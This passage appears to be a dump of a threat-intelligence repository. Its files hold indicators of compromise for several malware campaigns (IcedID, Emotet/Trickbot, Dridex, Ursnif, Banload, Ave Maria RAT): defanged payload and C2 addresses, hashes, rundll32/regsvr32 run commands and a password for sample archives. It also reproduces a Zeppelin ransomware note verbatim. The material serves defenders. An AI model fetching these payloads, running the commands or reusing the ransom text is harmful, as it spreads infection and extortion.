part of a long-running campaign that has used email attachments to distribute various families of malware. 6 | - The attached Word or Excel documents use a resume theme, and they have macros designed to infect a vulnerable Windows host. 7 | - In recent weeks, Excel spreadsheets from this campaign pushed IcedID malware. 8 | - This week, the spreadsheets are pushing Ursnif (Gozi/ISFB) malware. 9 | - In this example, the follow-up malware is an information stealer, possibly from the Delf malware family. 10 | - For more information about Ursnif/Gozi/ISFB, see: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi 11 | - For more information about Delf, see: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Delf&threatId=17696 12 | 13 | PCAP OF TRAFFIC FROM THIS INFECTION: 14 | 15 | - https://github.com/pan-unit42/tweets/blob/master/2020-12-10-Ursnif-infection-with-Delf-variant.pcap.zip 16 | 17 | DATE/TIME FOR START OF THE INFECTION: 18 | 19 | - 2020-12-10 (Thursday) at 00:19 UTC 20 | 21 | ASSOCIATED MALWARE: 22 | 23 | - SHA256 hash: 34c9a837ae0797151f8d3f6472ec03a1c309e773a35a0a4d6cf912dc952c4ad5 24 | - File size: 245,490 bytes 25 | - File name: myResume_345.xlsb 26 | - File description: Excel spreadsheet with macro for Ursnif (Gozi/ISFB) 27 | 28 | - SHA256 hash: ebdcae44c2a97e9b43045e79ebffc4b0db3fb92387a99e4432be3c03d51664a1 29 | - File size: 317,448 bytes 30 | - File location: hxxp://205.185.113[.]20/files/1.dll 31 | - File location: C:\yXPLXnD\YMVsnRT\LlwqJGc.dll 32 | - File description: DLL file for Ursnif (Gozi/ISFB) 33 | - Run method: rundll32.exe [filename],DllRegisterServer 34 | 35 | - SHA256 hash: b2cc1c54c3bbde2a7c0c0a32396bc6dba4d327d7a83278f478dce2f59d6751ef 36 | - File size: 700,416 bytes 37 | - File location: hxxp://162.0.224[.]165/server.rar [sent as encoded data, decrypted on victim host] 38 | - File location: C:\Users\[username]\AppData\Local\Temp\18531984.exe 39 | - File description: Delf malware 
variant 40 | 41 | INFECTION TRAFFIC: 42 | 43 | - 205.185.113[.]20 port 80 - 205.185.113[.]20 - GET /SYrgg8Ts 44 | - 205.185.113[.]20 port 80 - 205.185.113[.]20 - GET /files/1.dll 45 | - 37.120.222[.]107 port 80 - booloolo2[.]com - GET /images/[long base64 string with underscores and slashes].avi 46 | - 162.0.224[.]165 port 80 - 162.0.224[.]165 - GET /grab32.rar 47 | - 162.0.224[.]165 port 80 - 162.0.224[.]165 - GET /grab64.rar 48 | - 193.239.84[.]250 port 443 - HTTPS traffic 49 | - 162.0.224[.]165 port 80 - 162.0.224[.]165 - GET /server.rar 50 | - 79.110.52[.]28 port 15497 - TCP traffic caused by Delf variant 51 | -------------------------------------------------------------------------------- /2020-12-10-Ursnif-infection-with-Delf-variant.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2020-12-10-Ursnif-infection-with-Delf-variant.pcap.zip -------------------------------------------------------------------------------- /2020-12-11-Zepplin-ransomware-note.txt: -------------------------------------------------------------------------------- 1 | !!! ALL YOUR FILES ARE ENCRYPTED !!! 2 | 3 | All your files, documents, photos, databases and other important files are encrypted. 4 | 5 | You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. 6 | Only we can give you this key and only we can recover your files. 7 | 8 | To be sure we have the decryptor and it works you can send an email: yongloun@tutanota.com and decrypt one file for free. 9 | But this file should be of not valuable! 10 | 11 | Do you really want to restore your files? 12 | Write to email: wiruxa@airmail.cc 13 | Reserved email: anygrishevich@yandex.ru 14 | 15 | Your personal ID: 184-75F-AD3 16 | 17 | Attention! 18 | * Do not rename encrypted files. 
19 | * Do not try to decrypt your data using third party software, it may cause permanent data loss. 20 | * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 21 | -------------------------------------------------------------------------------- /2021-01-05-Emotet-and-Trickbot-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-01-05 (TUESDAY) - EMOTET EPOCH 2 INFECTION WITH TRICKBOT GTAG MOR10 2 | 3 | INFORMATION FROM EMAIL DISTRIBUTING EMOTET: 4 | 5 | - Received: from new.dtco-qatar[.]com (unknown [66.84.9[.]24]) 6 | - Date: Tue, 05 Jan 2021 12:08:03 -0300 7 | - From: "[spoofed sender name]" 8 | - To: "[recipient's name]" <[recipient's email address]> 9 | - Subject: Weekly data roundup 10 | - Attachment file name: Form.doc 11 | 12 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 13 | 14 | WORD MACRO RETRIEVING EMOTET DLL: 15 | 16 | - 173.254.250[.]226 port 443 (HTTPS) - fathekarim[.]com - GET /images/jiC/ 17 | 18 | EMOTET POST-INFECTION TRAFFIC: 19 | 20 | - 90.160.138[.]175 port 80 - 90.160.138[.]175 - POST /[string of alpha-numeric characters with or without backslashes] 21 | - 167.99.105[.]11 port 8080 - 167.99.105[.]11:8080 - POST /[string of alpha-numeric characters with or without backslashes] 22 | - NOTE: Saw several HTTP POST requests to the above IP addresses. 
23 | 24 | TRICKBOT POST-INFECTION TRAFFIC: 25 | 26 | - port 443 - api.ipify[.]org - HTTPS traffic (IP address check, not inherently malicious) 27 | - 102.164.208[.]44 port 449 - HTTPS traffic 28 | - 103.220.47[.]220 port 447 - HTTPS traffic 29 | - 110.39.160[.]66 port 447 - HTTPS traffic 30 | - 186.47.209[.]222 port 443 - 186.47.209[.]222:443 - POST /mor10/[ASCII string that includes host info]/83/ 31 | - 186.47.209[.]222 port 443 - 186.47.209[.]222:443 - POST /mor10/[ASCII string that includes host info]/81/ 32 | - 186.47.209[.]222 port 443 - 186.47.209[.]222:443 - POST /mor10/[ASCII string that includes host info]/90 33 | 34 | URLS USED BY TRICKBOT'S PROPAGATION MODULES TO RETRIEVE ADDITIONAL TRICKBOT EXE FILES: 35 | 36 | - 192.119.162[.]87 port 80 - 192.119.162[.]87 - GET /images/saved.png 37 | - 192.119.162[.]87 port 80 - 192.119.162[.]87 - GET /images/mingup.png 38 | 39 | MALWARE FROM THIS INFECTION: 40 | 41 | - SHA256 hash: fa67e7f709be28273b80782e6576f2e93ec9a1018626c3907d55e005fe12cf0d 42 | - File size: 176,027 bytes 43 | - File name: Form.doc 44 | - File description: Email attachment, Word doc with macros for Emotet epoch 2 45 | 46 | - SHA256 hash: bf56974a6feb0bb55e1a0064c4a9124f29e0fe5bca6b10fd5b7fa287b712eadb 47 | - File size: 195,072 bytes 48 | - File location: hxxps://fathekarim[.]com/images/jiC/ 49 | - File location: C:\Users\[username]\ 50 | - File location: C:\Users\[username]\AppData\Local\Ckninfwzsiyqxydc\ialkquzoobkioba.czi 51 | - File description: Windows DLL for Emotet epoch 2 retrieved by macro from above Word doc 52 | - Run method: rundll32.exe [filename],Control_RunDLL 53 | 54 | - SHA256 hash: f57ec5263ab7f3191cfd364dd364e694f93769b691514d3a2e39e6812471e80e 55 | - File size: 602,112 bytes 56 | - File location: C:\Users\[username]\AppData\Local\Ckninfwzsiyqxydc\kripbnjh.exe 57 | - File location: C:\Users\[username]\AppData\newyearTV5382453440\kripbnjh.exe 58 | - File description: Windows EXE for Trickbot gtag mor10 59 | 60 | - SHA256 hash: 
59e1711d6e4323da2dc22cdee30ba8876def991f6e476f29a0d3f983368ab461 61 | - File size: 434,304 bytes 62 | - File location: hxxp://192.119.162[.]87/images/mingup.png 63 | - File description: Windows EXE retrieved by Trickbot-infected host for Trickbot gtag lib5 64 | 65 | - SHA256 hash: ed8dea5381a7f6c78108a04344dc73d5669690b7ecfe6e44b2c61687a2306785 66 | - File size: 442,496 bytes 67 | - File location: hxxp://192.119.162[.]87/images/saved.png 68 | - File description: Windows EXE retrieved by Trickbot-infected host for Trickbot gtag tot5 -------------------------------------------------------------------------------- /2021-01-06-SystemBC-domain-list.txt: -------------------------------------------------------------------------------- 1 | 26asdcgd[.]com 2 | adsblog179[.]xyz 3 | xadsblog279[.]xyz 4 | fgksdstat14tp[.]xyz 5 | gmstar23[.]xyz 6 | fgkmailserv19fd[.]xyz 7 | psxadvexmail19mn[.]xyz 8 | mxblogs19[.]xyz 9 | adxspace147[.]xyz 10 | rzazmrserv194[.]xyz 11 | pzlkxadvert475[.]xyz 12 | scgsdstat14tp[.]xyz 13 | gmstar23[.]xyz 14 | dec15coma[.]com 15 | dump17alertos[.]com 16 | knzmtxserv437[.]xyz 17 | servx278x[.]xyz 18 | admex175x[.]xyz 19 | dec15coma[.]xyz 20 | pqrmailadvert15dx[.]xyz 21 | swxmailserv19fd[.]xyz 22 | blogspex25[.]xyz 23 | advert127ds[.]xyz 24 | -------------------------------------------------------------------------------- /2021-01-08-IOCs-from-Ave-Maria-RAT.txt: -------------------------------------------------------------------------------- 1 | 2021-01-08 (FRIDAY) - EXAMPLE OF AVE MARIA RAT FROM MALICIOUS SPAM 2 | 3 | NOTE: 4 | 5 | - For more information about Remote Access Tool (RAT) malware called Ave Maria, see: 6 | https://team-cymru.com/blog/2019/07/25/unmasking-ave_maria/ 7 | 8 | EMAIL HEADERS: 9 | 10 | Received: from [45.15.143.212] (port=62972 helo=mediplusmedikal.com) 11 | by [information removed] (envelope-from ) 12 | id 1kxcBL-002VfA-PI for [information removed]; Thu, 07 Jan 2021 13:47:02 -0700 13 | From: Tonia Kins 14 | Subject: RE: Re:Fw: 
Telex Release #06012020.xls 15 | Date: 07 Jan 2021 21:46:41 +0100 16 | Message-ID: <20210107214641.DDA47117FE9E2265@mediplusmedikal.com> 17 | 18 | ASSOCIATED MALWARE: 19 | 20 | - SHA256 hash: 07a877cc1499b20ae7bcaf0200f2576a100754fa661e391f36cbb95aa58a75b9 21 | - File size: 122,880 bytes 22 | - File name: Telex#06012020.xls 23 | - File description: Email attachment, an Excel spreadsheet with macro for Ave Maria RAT 24 | 25 | - SHA256 hash: 0d036e60f241fa89c4662fdaad193a5a7a372677a436b0e91cec8e96d4b7c7a6 26 | - File size: 453,227 bytes 27 | - File location: hxxp://lankarecipes[.]com/mages.jpg 28 | - File description: Text file for Powershell script retreived by Excel macro 29 | 30 | - SHA256 hash: 504e0489472d6107d56d6d4f88600200b055bd97c3158ef1c9a54ea38074351a 31 | - File size: 339,293 bytes 32 | - File location: C:\Users\[username]\AppData\Local\Temp\Test3.jpg 33 | - File description: Windows EXE for Ave Maria RAT 34 | 35 | TRAFFIC TO RETRIEVE POWERSHELL SCRIPT: 36 | 37 | - 192.185.236[.]165 port 80 - lankarecipes[.]com - GET /mages.jpg 38 | 39 | POST-INFECTION C2 TRAFFIC: 40 | 41 | - 37.46.150[.]86 port 5200 - encoded or encrypted TCP traffic (not HTTPS/SSL/TLS) -------------------------------------------------------------------------------- /2021-01-11-IOCs-for-Dridex-traffic-with-webshell.txt: -------------------------------------------------------------------------------- 1 | 2021-01-11 (MONDAY) - DRIDEX INFECTION WITH WEBSHELL TRAFFIC 2 | 3 | REFERENCES: 4 | 5 | - https://twitter.com/JAMESWT_MHT/status/1348655938216087553 6 | - https://twitter.com/58_158_177_102/status/1348649830344581122 7 | - https://twitter.com/reecdeep/status/1348649270174478336 8 | 9 | HEADERS FROM EXAMPLE OF EMAIL DISTRIBUTING DRIDEX 10 | 11 | Received: from exchange.millepiedi.net (unknown [93.145.111.74]) 12 | by [recipient's email server] (Postfix) with ESMTP id 908DB500802 13 | for <[recipient's email address]>; Mon, 11 Jan 2021 16:25:08 +0100 (CET) 14 | Received: from 
[90.110.38.175] (account 15 | silveringe19@CHR1PR1EX72.chrobinson.com HELO 16 | pnmmtcyqojjwaq.lrbgmdgxrtay.host) 17 | by exchange.millepiedi.net (Postfix) 18 | with ESMTPA id 42163DbB for [recipient's email address]; 19 | Mon, 11 Jan 2021 16:25:07 +0100 20 | Received: from [192.141.1.76] (account silveringe19@CHR1PR1EX72.chrobinson.com 21 | HELO mrfnciscl.cyrugjzysixn.biz) by exchange.millepiedi.net (Postfix) 22 | with esmtpa id 221eCDdA for [recipient's email address]; 23 | Mon, 11 Jan 2021 16:25:07 +0100 24 | Date: Mon, 11 Jan 2021 16:25:07 +0100 25 | Message-ID: 26 | From: 27 | To: [recipient's email address] 28 | Subject: Freightquote Invoice 29 | Attachment name: INV3856501643-20210111381234.xlsm 30 | 31 | ASSOCIATED MALWARE: 32 | 33 | - SHA256 hash: a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0 34 | - File size: 42,039 bytes 35 | - File name: INV9261221402-20210111302151.xlsm 36 | - File description: Email attachment, an Excel file with macro for Dridex 37 | 38 | - SHA256 hash: 3997bf3cf7485ae768f7a23aaa9004f73b0594550611138906821f9b4dc9bce7 39 | - File size: 318,976 bytes 40 | - File location: hxxp://www.sustaino2[.]com/q0ig4v.rar 41 | - File location: C:\Users\[username]\AppData\Local\Temp\uyqpshep.dll 42 | - File description: Example of DLL called by Excel macro to install Dridex 43 | - Run method: regsvr32.exe -s [filename]. 
44 | 45 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 46 | 47 | - 43.255.154[.]9 port 80 - www.sustaino2[.]com - GET /q0ig4v.rar (Dridex DLL) 48 | - 77.220.64[.]37 port 443 - HTTPS C2 traffic caused by Dridex 49 | - 23.95.132[.]44 port 443 - HTTPS C2 traffic caused by Dridex 50 | - 151.80.241[.]109 port 443 - 151.80.241[.]109:2953 - GET / (webshell traffic) 51 | 52 | NOTE: An example of the webshell can be downloaded from: https://app.any.run/tasks/00c67973-c98b-49d0-bf33-c1f4da3d4078 -------------------------------------------------------------------------------- /2021-02-08-tech-zupport-scam-audio.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-02-08-tech-zupport-scam-audio.mp3 -------------------------------------------------------------------------------- /2021-03-08-IOCs-from-Banload-infection.txt: -------------------------------------------------------------------------------- 1 | 2021-03-08 (MONDAY) - BANLOAD MALWARE FROM NFS-e THEMED MALSPAM 2 | 3 | EMAIL HEADERS: 4 | 5 | Received: from contato06.notascentral[.]com ([13.75.169[.]12]) by [removed] for [removed]; 6 | Mon, 08 Mar 2021 14:47:29 +0000 (UTC) 7 | Received: from [127.0.0.1] (contato06 [127.0.0.1]) 8 | by contato06.notascentral[.]com (Postfix) with ESMTP id C8FFA425DA 9 | for [recipient's email address]; Mon, 8 Mar 2021 14:44:57 +0000 (UTC) 10 | Content-Type: multipart/alternative; 11 | boundary="===============4604171671619042800==" 12 | Subject: Nota Fiscal de Servicos Eletronica - NFS-e No. 
202125368583 emitida 13 | From: Prefeitura Do Recife 14 | To: [recipient's email address] 15 | Date: Mon, 8 Mar 2021 14:44:57 +0000 (UTC) 16 | 17 | LINK FROM THE EMAIL: 18 | 19 | - hxxps://arquivomes03.brazilsouth.cloudapp.azure[.]com/?usuario=[recipient's email address] 20 | 21 | MALICIOUS FILES: 22 | 23 | - SHA256 hash: 500015fe83d96b841d401a5d48287d3a164ec90d0810498af4d3b9ac73b67cda 24 | - File size: 130,522 bytes 25 | - File name: Arquivo-dig ZBVS WDNCNR HNUBHBAM BJRPHYLTYZ .zip 26 | - File description: ZIP archive containing Banload malware installer, downloaded from link in the email. 27 | - NOTE: This is a different name and file hash each download 28 | 29 | - SHA256 hash: f364525bd719aefacb0453cb9eb8814d8c67b87ce0928aed13196936115f9280 30 | - File size: 274,432 bytes 31 | - File name: digital.-.online C∩RWROI┐A∩┐┐┐┐M╜∩╜┐╜X╜╜A╜S┐OYW╜┐N∩YMA┐T∩╜Z∩A∩╜CHZA.msi 32 | - File description: Installer for Banload malware 33 | 34 | - SHA256 hash: 53f76e3e31e07b39ec05c845666339930f7b8e37b9c07ed62dab10b2a30323d3 35 | - File size: 4,410,880 bytes 36 | - File name: C:\[various directory paths]\imgengine.dll 37 | - File description: Banload malware DLL named "imgengine.dll" and loaded by legitimate file DiscSoftBusServicePro.exe 38 | 39 | NON-MALICIOUS FILES ASSOCIATED WITH THIS INFECTION: 40 | 41 | - SHA256 hash: ee38171c75dbb5c3cde877ec28d8cca9eec2ca3277eea9250e03bd90b1125d6f 42 | - File size: 1,970,368 bytes 43 | - File name: C:\[various directory paths\[random name].exe 44 | - File description: Copy DiscSoftBusServicePro.exe, a legitimate EXE that's part of DAEMON Tools Pro software 45 | - NOTE: This file is used to load any DLL named imgengine.dll. 
46 | 47 | - SHA256 hash: 1c7d5e42ff3bc5e1a0ecd01fa68633dc67515b3a06e660fcd2d22d6ea436a6f1 48 | - File size: 51,232 bytes 49 | - File name: C:\[various directory paths]\sptdintf.dll 50 | - File description: A legitimate DLL file also loaded by DiscSoftBusServicePro.exe 51 | 52 | TRAFFIC FROM AN INFECTION: 53 | 54 | - hxxps://arquivomes03.brazilsouth.cloudapp.azure[.]com/?usuario=[recipient's email address] 55 | - hxxps://arquivomes03.brazilsouth.cloudapp.azure[.]com/index_1/ 56 | - hxxps://casaprodutosportal[.]net/hintro/hilos.gif 57 | - hxxps://shonitrohifi[.]com/hiroshi/rihappy.php 58 | - hxxps://docs.google[.]com/document/d/1D_TTlVEZzJILrMcnt5CP_WNlo5yXWZVbFDYwXT24NHI/edit 59 | - hxxps://hirotrindade.webcindario[.]com/soremb/especial -------------------------------------------------------------------------------- /2021-03-15-IcedID-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-03-15 (MONDAY) ICEDID (BOKBOT) FROM EXCEL SPREADSHEET MACROS 2 | 3 | EMAIL, TRAFFIC, AND MALWARE SAMPLES AVAILABLE AT: 4 | 5 | - https://github.com/pan-unit42/tweets/blob/master/2021-03-15-malspam-pushing-IcedID.eml.zip 6 | - https://github.com/pan-unit42/tweets/blob/master/2021-03-15-IcedID-infection-traffic.pcap.zip 7 | - https://github.com/pan-unit42/tweets/blob/master/2021-03-15-IcedID-malware-and-artifacts.zip 8 | 9 | NOTE: Password for any of the above zip archives is: infected 10 | 11 | INFECTION CHAIN: 12 | 13 | - malicious spam --> ZIP attachment --> extract Excel file --> enable macros --> Installer DLL --> gziploader process --> IcedID 14 | 15 | REFERENCE: 16 | 17 | - https://www.binarydefense.com/icedid-gziploader-analysis/ 18 | 19 | ASSOCIATED MALWARE: 20 | 21 | - SHA256 hash: 0b31911de524410fef3725f6fe5b565c6cb3e3b2ea5b7267bebc097f9fb57eb3 22 | - File size: 156,675 bytes 23 | - File name: CompensationClaim_605614143_03152021.zip 24 | - File description: ZIP archive attached to malicious spam pushing IcedID 25 | 26 | - 
SHA256 hash: 1852801558498c3bbc67b028b592ba9444a4e687a7f67737a393ce3f756d8c87 27 | - File size: 239,104 bytes 28 | - File name: CompensationClaim_605614143_03152021.xls 29 | - File description: Extracted from the above ZIP archive, an Excel file with macro for IcedID 30 | 31 | - SHA256 hash: f175d5883a0958f8ce10c387fef6c6750d26089e7413bf7b9a3767b655e61417 32 | - File size: 44,544 bytes 33 | - File location: hxxp://188.127.254[.]114/44270.7145450231.dat 34 | - File location: hxxp://185.82.219[.]160/44270.7145450231.dat 35 | - File location: hxxp://45.140.146[.]34/44270.7145450231.dat 36 | - File location: C:\Users\[username]\SOT.GOT 37 | - File location: C:\Users\[username]\SOT.GOT1 38 | - File location: C:\Users\[username]\SOT.GOT2 39 | - File description: Installer DLL for IcedID 40 | - Run method: rundll32.exe [filename],DllRegisterServer 41 | 42 | - SHA256 hash: 54d7277a2637bd8b410419f06a189b902243e91eb683435b931ae013d5a576f0 43 | - File size: 36,352 bytes 44 | - File location: C:\Users\[username]\AppData\Local\Temp\raise_x64.tmp 45 | - File description: Initial IcedID DLL 46 | - Run method: rundll32.exe [filename],update /i:[filepath]\license.dat 47 | 48 | - SHA256 hash: 7b329e340343bcdf1a70d1b487093bb3a4579f603a97214ecdcf78b339a6a1fc 49 | - File size: 36,352 bytes 50 | - File location: C:\Users\[username]\AppData\Roaming\{00F0279B-1BB6-6935-485C-566FF0BA28FC}\[username]\ruoyan.dll 51 | - File description: Persistent IcedID DLL 52 | - Run method: rundll32.exe [filename],update /i:[filepath]\license.dat 53 | 54 | - SHA256 hash: 45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865 55 | - File size: 341,002 bytes 56 | - File location: C:\Users\[username]\AppData\Roaming\SpringGoat\license.dat 57 | - File description: Data file used by the above two IcedID DLL files 58 | 59 | TRAFFIC TO RETRIEVE INSTALLER DLL FOR ICEDID: 60 | 61 | - 188.127.254[.]114 port 80 - 188.127.254[.]114 - GET /44270.7145450231.dat 62 | - 185.82.219[.]160 port 80 - 
185.82.219[.]160 - GET /44270.7145450231.dat 63 | - 45.140.146[.]34 port 80 - 45.140.146[.]34 - GET /44270.7145450231.dat 64 | 65 | TRAFFIC GENERATED BY INSTALLER DLL: 66 | 67 | - port 443 - aws.amazon.com - HTTPS traffic 68 | - 178.128.243[.]14 port 80 - apoxiolazio55[.]space GET / 69 | 70 | ICEDID C2 TRAFFIC: 71 | 72 | - 165.227.28[.]47 port 443 - twotoiletsr[.]space - HTTPS traffic 73 | - 165.227.28[.]47 port 443 - iporumuski[.]fun - HTTPS traffic -------------------------------------------------------------------------------- /2021-03-15-IcedID-infection-traffic.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-15-IcedID-infection-traffic.pcap.zip -------------------------------------------------------------------------------- /2021-03-15-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-15-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-03-15-malspam-pushing-IcedID.eml.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-15-malspam-pushing-IcedID.eml.zip -------------------------------------------------------------------------------- /2021-03-22-Dridex-malspam-10-examples.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-22-Dridex-malspam-10-examples.zip -------------------------------------------------------------------------------- /2021-03-22-Dridex-malware-and-artifacts.zip: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-22-Dridex-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-03-24-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2021-03-24 (WEDNESDAY) - ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - A zip archive containing the associated malware and artifacts is available at: 6 | 7 | -- https://github.com/pan-unit42/tweets/blob/master/2021-03-24-IcedID-malware-and-artifacts.zip 8 | 9 | - This infection took place in an Active Directory (AD) environment, and we saw traffic associated with Cobalt Strike activity after the initial IcedID infection. 10 | 11 | - We often see follow-up activity like Cobalt Strike from IcedID and other malware families when testing in an AD environment. But when testing the same malware on stand-alone Windows hosts, we do not find Cobalt Strike. 
12 | 13 | CHAIN OF EVENTS: 14 | 15 | - Email --> attached ZIP archive --> extracted Excel spreadsheet --> Enable macros --> installer DLL --> gzip compressed binary --> IcedID (Bokbot) 16 | 17 | MALWARE FROM AN INFECTION: 18 | 19 | - SHA256 hash: 03494593165c2e14643f692edf60ee67ba5983d814eea12d8ea7319eb1a28100 20 | - File size: 208,386 bytes 21 | - File name: Documents (478).xlsm 22 | - File description: Example of Excel spreadsheet with macro for IcedID (Bokbot) 23 | 24 | - SHA256 hash: 39022f8c0188179ac2459fb3757db51f61cd9657568ee79001c6f9501d85e84e 25 | - File size: 67,416 bytes 26 | - File location: hxxp://ovesf23knfg03eixqds[.]xyz/gf.gif 27 | - File location: C:\Users\Public\connectfront.xref 28 | - File description: Installer DLL for IcedID (Bokbot) 29 | - Run method: regsvr32 -s C:\Users\Public\connectfront.xref 30 | 31 | - SHA256 hash: f90ddca891da06aece3acf7e63070b4cb7d2c5acc0e52ad73b23ae795befd237 32 | - File size: 386,379 bytes 33 | - File location: hxxp://24savetonnofmaoney[.]xyz/ 34 | - File description: Binary with gzip compressed data used to create license.dat and IcedID DLL files 35 | 36 | - SHA256 hash: 29d2a8344bd725d7a8b43cc77a82b3db57a5226ce792ac4b37e7f73ec468510e 37 | - File size: 341,098 bytes 38 | - File location: C:\Users\[username]\AppData\Roaming\LuxuryQuarter\license.dat 39 | - File description: data binary needed to run the IcedID DLL files 40 | 41 | - SHA256 hash: 6c2846b4ea908abb46663d6044a50012d42eed123bf47fe045f59f076104c92c 42 | - File size: 45,056 bytes 43 | - File location: C:\Users\[username]\AppData\Local\Temp\item_64.dat 44 | - File description: initial IcedID DLL 45 | - Run method: rundll32.exe [filename],update /i:"AreaArrest\license.dat" 46 | 47 | - SHA256 hash: 5fe4d17b25fd66a417eb4f4fe1c9214f9410bb66937ad877295c938f318c2744 48 | - File size: 45,056 bytes 49 | - File location: C:\Users\[username]\AppData\Roaming\[username]\{9382BE5D-ADC1-386D-2E12-25BAA43199E2}\aruqsefu.dll 50 | - File description: persistent IcedID DLL 51 
| - Run method: rundll32.exe [filename],update /i:"AreaArrest\license.dat" 52 | 53 | TRAFFIC FROM AN INFECTION: 54 | 55 | TRAFFIC TO RETRIEVE INSTALLER DLL: 56 | 57 | - 8.209.98[.]100 port 80 - ovesf23knfg03eixqds[.]xyz - GET /gf.gif 58 | 59 | TRAFFIC GENERATED BY RUNNING INSTALLER DLL: 60 | 61 | - port 443 (HTTPS) - aws.amazon[.]com - GET / (connectivity check, not malicious) 62 | - 164.90.163[.]184 port 80 - 24savetonnofmaoney[.]xyz - GET / 63 | 64 | ICEDID (BOKBOT) C2 TRAFFIC: 65 | 66 | - 138.68.10[.]5 port 443 - shaxtugel[.]fun 67 | - 138.68.10[.]5 port 443 - kosmolitopor[.]space 68 | 69 | COBALT STRIKE TRAFFIC: 70 | 71 | - 66.70.246[.]6 port 443 - HTTPS traffic 72 | - 66.70.246[.]6 port 443 - securityinstant[.]org - HTTPS traffic 73 | -------------------------------------------------------------------------------- /2021-03-24-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-24-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-04-12-IcedID-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-04-12 (MONDAY) - ICEDID (BOKBOT) FROM ZIPPED JS FILE: 2 | 3 | NOTES: 4 | 5 | - A zip archive containing the associated malware and artifacts is available at: 6 | 7 | -- https://github.com/pan-unit42/tweets/blob/master/2021-04-12-IcedID-malware-and-artifacts.zip 8 | 9 | - Reference: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ 10 | 11 | - Based on the above report, we found a zip archive from today (Monday 2021-04-12) containing a malicious .js file associated with this campaign. 
12 | 13 | MALWARE: 14 | 15 | - SHA256 hash: d4993d4433e5f847362591e3148009a071244e464c7b265affb6e6e07985610c 16 | - File size: 8,119 bytes 17 | - File name: StolenImages_Evidence.zip 18 | - File description: ZIP archive retrieved from link in email pushing IcedID 19 | 20 | - SHA256 hash: 0314b8cd45b636f38d07032dc8ed463295710460ea7a4e214c1de7b0e817aab6 21 | - File size: 28,195 bytes 22 | - File name: StolenImages_Evidence.js 23 | - File description: JS file extracted from the above ZIP archive 24 | 25 | - SHA256 hash: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c 26 | - File size: 214,542 bytes 27 | - File location: hxxp://banusdona[.]top/222g100/main.php 28 | - File location: C:\Users\[username]\AppData\Local\Temp\JwWdx.dat 29 | - File description: Installer DLL for IcedID 30 | - Run method: rundll32.exe [filename],DllRegisterServer 31 | 32 | - SHA256 hash: 3d1b525ec2ee887bbc387654f6ff6d88e41540b789ea124ce51fb5565e2b8830 33 | - File size: 507,723 bytes 34 | - File location: hxxp://momenturede[.]fun/ 35 | - File description: Fake gzip file called by installer DLL used to create IcedID DLL and license.dat files 36 | 37 | - SHA256 hash: 29d2a8344bd725d7a8b43cc77a82b3db57a5226ce792ac4b37e7f73ec468510e 38 | - File size: 341,098 bytes 39 | - File location: C:\Users\[username]\AppData\Roaming\GlancePlay\license.dat 40 | - File description: binary data file used to run IcedID DLL files 41 | 42 | - SHA256 hash: a0f92bc42ff69b63a34614f4795c40a2ca3884493949025b48d633dc2efa8ab6 43 | - File size: 166,400 bytes 44 | - File location: C:\Users\[username]\AppData\Local\Temp\originalx32.dat 45 | - File description: Initial DLL for IcedID infection 46 | - Run method: rundll32.exe [filename],update /i:"GlancePlay\license.dat" 47 | 48 | - SHA256 hash: e989aa952f71816e08a8587ba20f37f5d6f4c5196d368b6229183ac9542e2c85 49 | - File size: 166,400 bytes 50 | - File location: C:\Users\[username]\AppData\Roaming\[username]\Haimaw2.dll 51 | - File description: Persistent DLL 
